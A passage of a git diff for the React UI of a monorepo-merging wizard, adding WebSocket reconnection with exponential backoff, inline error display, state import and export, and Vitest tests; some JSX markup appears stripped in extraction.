UseWebSocketReturn) { setState((prev) => { switch (event.type) { - case 'log': - return { - ...prev, - logs: [...prev.logs, { level: event.level ?? 'info', message: event.message ?? '' }], - }; + case 'log': { + const newLog = { level: event.level ?? 'info', message: event.message ?? '' }; + const logs = prev.logs.length >= MAX_LOGS + ? [...prev.logs.slice(-MAX_LOGS + 1), newLog] + : [...prev.logs, newLog]; + return { ...prev, logs }; + } case 'result': return { ...prev, result: event.data ?? null }; case 'error': diff --git a/ui/src/hooks/useWebSocket.test.tsx b/ui/src/hooks/useWebSocket.test.tsx new file mode 100644 index 0000000..bd2faa8 --- /dev/null +++ b/ui/src/hooks/useWebSocket.test.tsx @@ -0,0 +1,130 @@ +import { act, renderHook } from '@testing-library/react'; +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import { useWebSocket } from './useWebSocket'; + +class MockWebSocket { + static OPEN = 1; + static CLOSED = 3; + static instances: MockWebSocket[] = []; + + readyState = MockWebSocket.OPEN; + send = vi.fn(); + close = vi.fn(() => { + this.readyState = MockWebSocket.CLOSED; + this.onclose?.(new CloseEvent('close')); + }); + + onopen: ((event: Event) => void) | null = null; + onclose: ((event: CloseEvent) => void) | null = null; + onerror: ((event: Event) => void) | null = null; + onmessage: ((event: MessageEvent) => void) | null = null; + + constructor(public readonly url: string) { + MockWebSocket.instances.push(this); + } + + emitOpen(): void { + this.readyState = MockWebSocket.OPEN; + this.onopen?.(new Event('open')); + } + + emitClose(): void { + this.readyState = MockWebSocket.CLOSED; + this.onclose?.(new CloseEvent('close')); + } + + emitError(): void { + this.onerror?.(new Event('error')); + } + + emitMessage(data: string): void { + this.onmessage?.({ data } as MessageEvent); + } +} + +describe('useWebSocket', () => { + beforeEach(() => { + MockWebSocket.instances = []; + vi.useFakeTimers(); + vi.spyOn(Math, 'random').mockReturnValue(0); + vi.stubGlobal('WebSocket', MockWebSocket as unknown as typeof WebSocket); + }); + + afterEach(() => { + vi.restoreAllMocks(); + vi.unstubAllGlobals(); + vi.useRealTimers(); + }); + + it('connects and sends subscribe/cancel messages', async () => { + const { result } = renderHook(() => useWebSocket()); + const ws = MockWebSocket.instances[0]; + expect(ws).toBeDefined(); + + act(() => { + ws.emitOpen(); + }); + expect(result.current.connected).toBe(true); + + act(() => { + result.current.subscribe('op-1'); + result.current.cancel('op-1'); + }); + + expect(ws.send).toHaveBeenNthCalledWith(1, JSON.stringify({ type: 'subscribe', opId: 'op-1' })); + expect(ws.send).toHaveBeenNthCalledWith(2, JSON.stringify({ type: 'cancel', opId: 'op-1' })); + }); + + it('retries with exponential backoff and marks connection failed after max retries', async () => { + const { result } = renderHook(() => useWebSocket()); + const first = MockWebSocket.instances[0]; + + act(() => { + first.emitOpen(); + }); + expect(result.current.connected).toBe(true); + + for (let attempt = 1; attempt <= 11; attempt += 1) { + const current = MockWebSocket.instances.at(-1); + expect(current).toBeDefined(); + + act(() => { + current!.emitClose(); + }); + expect(result.current.retryCount).toBe(Math.min(attempt, 10)); + + if (attempt <= 10) { + const delay = Math.min(1000 * (2 ** (attempt - 1)), 30000); + act(() => { + vi.advanceTimersByTime(delay); + }); + expect(MockWebSocket.instances).toHaveLength(attempt + 1); + } + } + expect(result.current.connectionFailed).toBe(true); + expect(result.current.reconnecting).toBe(false); + expect(result.current.connected).toBe(false); + }); + + it('dispatches parsed events to listeners and ignores malformed messages', async () => { + const { result } = renderHook(() => useWebSocket()); + const ws = MockWebSocket.instances[0]; + const handler = vi.fn(); + + const unsubscribe = result.current.onEvent(handler); + + act(() => { + ws.emitMessage(JSON.stringify({ type: 'log', opId: 'op-1', message: 'hello' })); + ws.emitMessage('not-json'); + }); + + expect(handler).toHaveBeenCalledTimes(1); + expect(handler).toHaveBeenCalledWith({ type: 'log', opId: 'op-1', message: 'hello' }); + + unsubscribe(); + act(() => { + ws.emitMessage(JSON.stringify({ type: 'done', opId: 'op-1' })); + }); + expect(handler).toHaveBeenCalledTimes(1); + }); +}); diff --git a/ui/src/hooks/useWebSocket.ts b/ui/src/hooks/useWebSocket.ts index c2530cc..7562ab6 100755 --- a/ui/src/hooks/useWebSocket.ts +++ b/ui/src/hooks/useWebSocket.ts @@ -10,6 +10,10 @@ export interface WsEvent { export interface UseWebSocketReturn { connected: boolean; + reconnecting: boolean; + connectionFailed: boolean; + retryCount: number; + maxRetries: number; subscribe: (opId: string) => void; cancel: (opId: string) => void; onEvent: (handler: (event: WsEvent) => void) => () => void; @@ -19,23 +23,48 @@ export function useWebSocket(): UseWebSocketReturn { const wsRef = useRef(null); const handlersRef = useRef void>>(new Set()); const [connected, setConnected] = useState(false); + const [reconnecting, setReconnecting] = useState(false); + const [connectionFailed, setConnectionFailed] = useState(false); + const [retryCount, setRetryCount] = useState(0); useEffect(() => { let reconnectTimer: ReturnType; let ws: WebSocket; + let retryCount = 0; + const MAX_RETRIES = 10; + const BASE_DELAY = 1000; + let shuttingDown = false; function connect() { + if (shuttingDown) return; const protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:'; const url = `${protocol}//${window.location.host}/ws`; ws = new WebSocket(url); wsRef.current = ws; - ws.onopen = () => setConnected(true); + ws.onopen = () => { + setConnected(true); + setReconnecting(false); + setConnectionFailed(false); + setRetryCount(0); + retryCount = 0; // reset on successful connection + }; ws.onclose = () => { + if (shuttingDown) return; setConnected(false); - // Reconnect after 2 seconds - reconnectTimer = setTimeout(connect, 2000); + if (retryCount < MAX_RETRIES) { + const delay = Math.min(BASE_DELAY * Math.pow(2, retryCount), 30000) + + Math.random() * 1000; + retryCount++; + setRetryCount(retryCount); + setReconnecting(true); + setConnectionFailed(false); + reconnectTimer = setTimeout(connect, delay); + } else { + setReconnecting(false); + setConnectionFailed(true); + } }; ws.onerror = () => { @@ -57,6 +86,7 @@ export function useWebSocket(): UseWebSocketReturn { connect(); return () => { + shuttingDown = true; clearTimeout(reconnectTimer); ws?.close(); }; @@ -83,5 +113,14 @@ export function useWebSocket(): UseWebSocketReturn { }; }, []); - return { connected, subscribe, cancel, onEvent }; + return { + connected, + reconnecting, + connectionFailed, + retryCount, + maxRetries: 10, + subscribe, + cancel, + onEvent, + }; } diff --git a/ui/src/hooks/useWizardState.test.tsx b/ui/src/hooks/useWizardState.test.tsx new file mode 100644 index 0000000..eeb25ac --- /dev/null +++ b/ui/src/hooks/useWizardState.test.tsx @@ -0,0 +1,129 @@ +import { act, renderHook, waitFor } from '@testing-library/react'; +import { describe, expect, it, beforeEach, vi } from 'vitest'; +import type { WizardState } from '../api/client'; +import { useWizardState } from './useWizardState'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + getWizardState: vi.fn(), + putWizardState: vi.fn(), + initWizard: vi.fn(), +})); + +function makeState(overrides: Partial = {}): WizardState { + return { + version: 1, + createdAt: '2026-01-01T00:00:00.000Z', + updatedAt: '2026-01-01T00:00:00.000Z', + repos: ['./repo-a', './repo-b'], + currentStep: 'assess', + steps: [ + { id: 'assess', status: 'pending' }, + { id: 'prepare', status: 'pending' }, + ], + options: { + outputDir: './monorepo', + packagesDir: 'packages', + packageManager: 'pnpm', + conflictStrategy: 'highest', + workspaceTool: 'none', + }, + ...overrides, + }; +} + +describe('useWizardState', () => { + beforeEach(() => { + vi.clearAllMocks(); + vi.mocked(api.getWizardState).mockResolvedValue({ exists: true, state: makeState() }); + vi.mocked(api.putWizardState).mockResolvedValue({ ok: true }); + vi.mocked(api.initWizard).mockResolvedValue({ state: makeState({ currentStep: 'assess' }) }); + }); + + it('loads wizard state on mount', async () => { + const { result } = renderHook(() => useWizardState()); + + expect(result.current.loading).toBe(true); + + await waitFor(() => { + expect(result.current.loading).toBe(false); + expect(result.current.state?.currentStep).toBe('assess'); + }); + }); + + it('surfaces load errors', async () => { + vi.mocked(api.getWizardState).mockRejectedValue(new Error('boom')); + + const { result } = renderHook(() => useWizardState()); + + await waitFor(() => { + expect(result.current.loading).toBe(false); + expect(result.current.error).toBe('boom'); + expect(result.current.state).toBeNull(); + }); + }); + + it('saves full state via putWizardState', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + const next = makeState({ currentStep: 'prepare' }); + await act(async () => { + await result.current.save(next); + }); + + expect(api.putWizardState).toHaveBeenCalledWith(next); + expect(result.current.state?.currentStep).toBe('prepare'); + }); + + it('updates step state and persists', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + await act(async () => { + await result.current.updateStep('assess', { status: 'completed' }); + }); + + const updated = result.current.state; + expect(updated?.steps.find((s) => s.id === 'assess')?.status).toBe('completed'); + expect(api.putWizardState).toHaveBeenCalledTimes(1); + }); + + it('goToStep updates current step and persists', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + await act(async () => { + await result.current.goToStep('prepare'); + }); + + expect(result.current.state?.currentStep).toBe('prepare'); + expect(api.putWizardState).toHaveBeenCalledTimes(1); + }); + + it('imports and exports wizard state', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + const exported = result.current.exportState(); + expect(exported).toBeTruthy(); + + const imported = makeState({ currentStep: 'prepare' }); + await act(async () => { + await result.current.importState(JSON.stringify(imported)); + }); + + expect(api.putWizardState).toHaveBeenCalledWith(imported); + expect(result.current.state?.currentStep).toBe('prepare'); + }); + + it('rejects invalid import payloads', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + await expect(result.current.importState('{ invalid json')).rejects.toThrow(/Invalid JSON/); + await expect(result.current.importState(JSON.stringify({ nope: true }))).rejects.toThrow( + 'Invalid wizard state format' + ); + }); +}); diff --git a/ui/src/hooks/useWizardState.ts b/ui/src/hooks/useWizardState.ts index f22b6ab..341ec8c 100755 --- a/ui/src/hooks/useWizardState.ts +++ b/ui/src/hooks/useWizardState.ts @@ -15,6 +15,8 @@ export interface UseWizardStateReturn { init: (repos: string[]) => Promise; updateStep: (stepId: string, partial: Partial) => Promise; goToStep: (stepId: string) => Promise; + exportState: () => string | null; + importState: (json: string) => Promise; } export function useWizardState(): UseWizardStateReturn { @@ -67,5 +69,27 @@ export function useWizardState(): UseWizardStateReturn { [state, save], ); - return { state, loading, error, save, init, updateStep, goToStep }; + const exportState = useCallback((): string | null => { + if (!state) return null; + return JSON.stringify(state, null, 2); + }, [state]); + + const importState = useCallback( + async (json: string) => { + try { + const parsed = JSON.parse(json) as WizardState; + if (!parsed.version || !parsed.steps || !Array.isArray(parsed.steps)) { + throw new Error('Invalid wizard state format'); + } + await save(parsed); + } catch (err) { + throw err instanceof SyntaxError + ? new Error('Invalid JSON: ' + err.message) + : err; + } + }, + [save], + ); + + return { state, loading, error, save, init, updateStep, goToStep, exportState, importState }; } diff --git a/ui/src/pages/ArchivePage.tsx b/ui/src/pages/ArchivePage.tsx index 5aa80b2..88b5c3b 100755 --- a/ui/src/pages/ArchivePage.tsx +++ b/ui/src/pages/ArchivePage.tsx @@ -49,7 +49,7 @@ export function ArchivePage({ repos, onComplete, onSkip }: ArchivePageProps) {
- {error &&
{error}
} + {error &&
{error}
} {result && (
diff --git a/ui/src/pages/AssessPage.tsx b/ui/src/pages/AssessPage.tsx index 42695bb..96cca1a 100755 --- a/ui/src/pages/AssessPage.tsx +++ b/ui/src/pages/AssessPage.tsx @@ -6,6 +6,8 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { FindingsFilter } from '../components/FindingsFilter'; +import { SeverityBadge } from '../components/SeverityBadge'; interface AssessPageProps { ws: UseWebSocketReturn; @@ -14,26 +16,47 @@ interface AssessPageProps { onSkip: (stepId: string, rationale: string) => void; } +interface ExtendedFinding { + id: string; + title: string; + severity: 'info' | 'warn' | 'error' | 'critical'; + suggestedAction?: string; +} + +interface ExtendedAnalysis { + environment?: ExtendedFinding[]; + tooling?: ExtendedFinding[]; + ci?: ExtendedFinding[]; + publishing?: ExtendedFinding[]; + repoRisks?: ExtendedFinding[]; + riskSummary?: { + classification: string; + }; +} + interface AnalyzeResult { packages: Array<{ name: string; version: string; repoName: string }>; conflicts: Array<{ name: string; severity: string }>; collisions: Array<{ path: string; sources: string[] }>; complexityScore: number; recommendations: string[]; + extendedAnalysis?: ExtendedAnalysis; } export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const handleAnalyze = async () => { if (repos.length === 0) return; + setError(null); setLoading(true); try { const { opId } = await postAnalyze(repos); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -61,7 +84,8 @@ export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
@@ -110,6 +134,39 @@ export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { )} + {/* Extended Analysis */} + {result?.extendedAnalysis && ( +
+

Extended Analysis

+ {[ + { label: 'Environment', findings: result.extendedAnalysis.environment }, + { label: 'Tooling', findings: result.extendedAnalysis.tooling }, + { label: 'CI/CD', findings: result.extendedAnalysis.ci }, + { label: 'Publishing', findings: result.extendedAnalysis.publishing }, + { label: 'Repo Risks', findings: result.extendedAnalysis.repoRisks }, + ].filter(s => s.findings && s.findings.length > 0).map(section => ( +
+

{section.label}

+ +
+ ))} + + {result.extendedAnalysis.riskSummary && ( +
+

Risk Classification

+ + + {result.extendedAnalysis.riskSummary.classification} + +
+ )} +
+ )} + diff --git a/ui/src/pages/ConfigurePage.tsx b/ui/src/pages/ConfigurePage.tsx index 7012555..7f7ebbe 100755 --- a/ui/src/pages/ConfigurePage.tsx +++ b/ui/src/pages/ConfigurePage.tsx @@ -7,6 +7,7 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { DiffViewer } from '../components/DiffViewer'; interface ConfigurePageProps { ws: UseWebSocketReturn; @@ -16,14 +17,22 @@ interface ConfigurePageProps { onSkip: (stepId: string, rationale: string) => void; } +interface ConfigurePatch { + path: string; + before?: string; + after: string; +} + interface ConfigureResult { scaffoldedFiles: Array<{ relativePath: string; description: string }>; skippedConfigs: Array<{ name: string; reason: string }>; + patches?: ConfigurePatch[]; } export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: ConfigurePageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const [namesInput, setNamesInput] = useState(packageNames.join(', ')); const names = namesInput.split(/[\n,]/).map((s) => s.trim()).filter(Boolean); @@ -39,7 +48,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: }); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -50,6 +59,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: return (

4. Configure Workspace

+ {error &&
{error}
}
@@ -77,7 +87,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: - {op.error &&
{op.error}
} + {op.error &&
{op.error}
} {result && (
@@ -105,6 +115,22 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: )} + {result.patches && result.patches.length > 0 && ( + <> +

Config Patches ({result.patches.length})

+
+ {result.patches.map((patch, i) => ( + + ))} +
+ + )} + diff --git a/ui/src/pages/MergePage.test.tsx b/ui/src/pages/MergePage.test.tsx new file mode 100644 index 0000000..0302a9e --- /dev/null +++ b/ui/src/pages/MergePage.test.tsx @@ -0,0 +1,157 @@ +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react'; +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { UseWebSocketReturn, WsEvent } from '../hooks/useWebSocket'; +import { MergePage } from './MergePage'; +import type { WizardGlobalOptions } from '../api/client'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + postPlan: vi.fn(), + postApply: vi.fn(), +})); + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +const defaultOptions: WizardGlobalOptions = { + outputDir: './monorepo', + packagesDir: 'packages', + packageManager: 'pnpm', + conflictStrategy: 'highest', + workspaceTool: 'none', +}; + +describe('MergePage', () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('runs plan then apply flow and emits callbacks', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postPlan).mockResolvedValue({ opId: 'plan-op' }); + vi.mocked(api.postApply).mockResolvedValue({ opId: 'apply-op' }); + + const onPlanPathChange = vi.fn(); + const onPackageNamesChange = vi.fn(); + const onComplete = vi.fn(); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Generate Plan' })); + + await waitFor(() => { + expect(api.postPlan).toHaveBeenCalledWith(['./repo-a', './repo-b'], { + output: './monorepo', + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + workspaceTool: 'none', + }); + expect(ws.subscribe).toHaveBeenCalledWith('plan-op'); + }); + + act(() => { + ws.emit({ + type: 'result', + opId: 'plan-op', + data: { + planPath: '/tmp/mono.plan.json', + plan: { + sources: [{ name: 'repo-a' }, { name: 'repo-b' }], + files: [{ relativePath: 'README.md', content: '# mono' }], + }, + }, + }); + ws.emit({ type: 'done', opId: 'plan-op' }); + }); + + await waitFor(() => { + expect(onPlanPathChange).toHaveBeenCalledWith('/tmp/mono.plan.json'); + expect(onPackageNamesChange).toHaveBeenCalledWith(['repo-a', 'repo-b']); + expect(screen.getByText(/Plan saved to/i)).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Proceed to Apply' })); + + fireEvent.click(screen.getByRole('button', { name: 'Apply Plan' })); + await waitFor(() => { + expect(api.postApply).toHaveBeenCalledWith('/tmp/mono.plan.json', './monorepo'); + expect(ws.subscribe).toHaveBeenCalledWith('apply-op'); + }); + + act(() => { + ws.emit({ type: 'result', opId: 'apply-op', data: { outputDir: './monorepo', packageCount: 2 } }); + ws.emit({ type: 'done', opId: 'apply-op' }); + }); + + await waitFor(() => { + expect(screen.getByRole('button', { name: 'Mark Complete & Continue' })).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Mark Complete & Continue' })); + expect(onComplete).toHaveBeenCalledTimes(1); + }); + + it('renders plan request errors inline', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postPlan).mockRejectedValue(new Error('Plan failed')); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Generate Plan' })); + + await waitFor(() => { + expect(screen.getByRole('alert')).toHaveTextContent('Plan failed'); + }); + }); +}); diff --git a/ui/src/pages/MergePage.tsx b/ui/src/pages/MergePage.tsx index 91dccd3..92b72ea 100755 --- a/ui/src/pages/MergePage.tsx +++ b/ui/src/pages/MergePage.tsx @@ -1,4 +1,4 @@ -import { useState } from 'react'; +import { useState, useEffect } from 'react'; import type { UseWebSocketReturn } from '../hooks/useWebSocket'; import { useOperation } from '../hooks/useOperation'; import { postPlan, postApply } from '../api/client'; @@ -7,19 +7,21 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { TreePreview } from '../components/TreePreview'; interface MergePageProps { ws: UseWebSocketReturn; repos: string[]; options: WizardGlobalOptions; onPlanPathChange: (planPath: string) => void; + onPackageNamesChange: (names: string[]) => void; onComplete: () => void; onSkip: (stepId: string, rationale: string) => void; } type Phase = 'plan' | 'apply'; -export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, onSkip }: MergePageProps) { +export function MergePage({ ws, repos, options, onPlanPathChange, onPackageNamesChange, onComplete, onSkip }: MergePageProps) { const [phase, setPhase] = useState('plan'); const planOp = useOperation(ws); const applyOp = useOperation(ws); @@ -39,7 +41,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on }); planOp.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -52,20 +54,31 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on const { opId } = await postApply(planPath, options.outputDir); applyOp.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } }; - const planResult = planOp.result as { planPath?: string; plan?: Record } | null; + const planResult = planOp.result as { planPath?: string; plan?: Record; operations?: Array<{ outputs?: string[] }> } | null; const applyResult = applyOp.result as { outputDir?: string; packageCount?: number } | null; + const [error, setError] = useState(null); - // Auto-set plan path when plan completes - if (planResult?.planPath && planPath !== planResult.planPath) { - setPlanPath(planResult.planPath); - onPlanPathChange(planResult.planPath); - } + // Auto-set plan path and extract package names when plan completes + useEffect(() => { + if (planResult?.planPath && planPath !== planResult.planPath) { + setPlanPath(planResult.planPath); + onPlanPathChange(planResult.planPath); + } + if (planResult?.plan?.sources && Array.isArray(planResult.plan.sources)) { + const names = (planResult.plan.sources as Array<{ name?: string }>) + .map((s) => s.name) + .filter((n): n is string => !!n); + if (names.length > 0) { + onPackageNamesChange(names); + } + } + }, [planResult?.planPath, planResult?.plan?.sources]); const planCliArgs = [ 'monorepo plan', ...repos, @@ -80,6 +93,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on return (

3. Merge Repositories

+ {error &&
{error}
}
- {planOp.error &&
{planOp.error}
} + {planOp.error &&
{planOp.error}
} {planResult && (
@@ -122,6 +136,17 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on
{JSON.stringify(planResult.plan, null, 2)}
)} + {planResult?.operations && ( +
+

Planned File Structure

+ op.outputs) + .flatMap((op: { outputs?: string[] }) => op.outputs!)} + title="Monorepo Structure" + /> +
+ )} @@ -157,7 +182,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on
- {applyOp.error &&
{applyOp.error}
} + {applyOp.error &&
{applyOp.error}
} {applyResult && (
diff --git a/ui/src/pages/OperatePage.tsx b/ui/src/pages/OperatePage.tsx index 9a29f1d..a1072a9 100755 --- a/ui/src/pages/OperatePage.tsx +++ b/ui/src/pages/OperatePage.tsx @@ -62,6 +62,72 @@ export function OperatePage({ steps, repos, options }: OperatePageProps) { +

Completion Summary

+
+

+ {completed} step{completed !== 1 ? 's' : ''} completed,{' '} + {skipped} skipped,{' '} + {pending} remaining. +

+ {skipped > 0 && ( +
+ Skipped steps: +
    + {steps.filter((s) => s.status === 'skipped').map((s) => ( +
  • + {s.id}{s.skipRationale ? ` — ${s.skipRationale}` : ''} +
  • + ))} +
+
+ )} +
+ +

Next Steps

+
+

+ Re-run verification to confirm the monorepo is healthy: +

+ + + or run monorepo verify --dir {options.outputDir} + +
+ +

Add Repository

+
+

+ Need to add another repository to the monorepo? +

+

+ Use monorepo add <repo> --to {options.outputDir} to add + repositories incrementally. A guided wizard for this workflow is coming soon. +

+
+
diff --git a/ui/src/pages/PreparePage.tsx b/ui/src/pages/PreparePage.tsx index c121f06..9413458 100755 --- a/ui/src/pages/PreparePage.tsx +++ b/ui/src/pages/PreparePage.tsx @@ -25,16 +25,18 @@ interface PrepareResult { export function PreparePage({ ws, repos, targetNodeVersion, onTargetNodeVersionChange, onComplete, onSkip }: PreparePageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const handlePrepare = async () => { if (repos.length === 0) return; + setError(null); setLoading(true); try { const options = targetNodeVersion ? { targetNodeVersion } : {}; const { opId } = await postPrepare(repos, options); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -72,7 +74,8 @@ export function PreparePage({ ws, repos, targetNodeVersion, onTargetNodeVersionC - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
diff --git a/ui/src/pages/VerifyPage.test.tsx b/ui/src/pages/VerifyPage.test.tsx new file mode 100644 index 0000000..97009a6 --- /dev/null +++ b/ui/src/pages/VerifyPage.test.tsx @@ -0,0 +1,136 @@ +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react'; +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { UseWebSocketReturn, WsEvent } from '../hooks/useWebSocket'; +import { VerifyPage } from './VerifyPage'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + postVerify: vi.fn(), +})); + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +describe('VerifyPage', () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('runs plan-mode verification and renders results', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockResolvedValue({ opId: 'verify-op' }); + const onComplete = vi.fn(); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(api.postVerify).toHaveBeenCalledWith({ plan: '/tmp/mono.plan.json', tier: 'static' }); + expect(ws.subscribe).toHaveBeenCalledWith('verify-op'); + }); + + act(() => { + ws.emit({ + type: 'result', + opId: 'verify-op', + data: { + tier: 'static', + checks: [{ id: 'c1', message: 'Root package.json has private: true', status: 'pass', tier: 'static' }], + summary: { total: 1, pass: 1, warn: 0, fail: 0 }, + ok: true, + }, + }); + ws.emit({ type: 'done', opId: 'verify-op' }); + }); + + await waitFor(() => { + expect(screen.getByText('Verification passed')).toBeInTheDocument(); + expect(screen.getByText('Root package.json has private: true')).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Mark Complete & Continue' })); + expect(onComplete).toHaveBeenCalledTimes(1); + }); + + it('supports directory mode payloads', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockResolvedValue({ opId: 'verify-op' }); + + render( + , + ); + + fireEvent.click(screen.getByRole('radio', { name: 'Directory' })); + fireEvent.change(screen.getByRole('combobox'), { target: { value: 'full' } }); + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(api.postVerify).toHaveBeenCalledWith({ dir: '/tmp/mono', tier: 'full' }); + expect(ws.subscribe).toHaveBeenCalledWith('verify-op'); + }); + }); + + it('renders verify request errors inline', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postVerify).mockRejectedValue(new Error('Verify failed')); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Verify' })); + + await waitFor(() => { + expect(screen.getByRole('alert')).toHaveTextContent('Verify failed'); + }); + }); +}); diff --git a/ui/src/pages/VerifyPage.tsx b/ui/src/pages/VerifyPage.tsx index 67eaa48..5de4d9d 100755 --- a/ui/src/pages/VerifyPage.tsx +++ b/ui/src/pages/VerifyPage.tsx @@ -27,6 +27,7 @@ export function VerifyPage({ ws, planPath: initialPlanPath, outputDir, onComplet const [planPath, setPlanPath] = useState(initialPlanPath || ''); const [dirPath, setDirPath] = useState(outputDir || ''); const [tier, setTier] = useState('static'); + const [error, setError] = useState(null); const op = useOperation(ws); const [loading, setLoading] = useState(false); @@ -34,13 +35,14 @@ export function VerifyPage({ ws, planPath: initialPlanPath, outputDir, onComplet const handleVerify = async () => { if (!inputValue) return; + setError(null); setLoading(true); try { const body = inputMode === 'plan' ? { plan: planPath, tier } : { dir: dirPath, tier }; const { opId } = await postVerify(body); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -101,7 +103,8 @@ export function VerifyPage({ ws, planPath: initialPlanPath, outputDir, onComplet - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
diff --git a/ui/src/pages/WizardSetup.tsx b/ui/src/pages/WizardSetup.tsx index 01f4762..f3e8279 100755 --- a/ui/src/pages/WizardSetup.tsx +++ b/ui/src/pages/WizardSetup.tsx @@ -42,7 +42,7 @@ export function WizardSetup({ onInit }: WizardSetupProps) { />
- {error &&
{error}
} + {error &&
{error}
}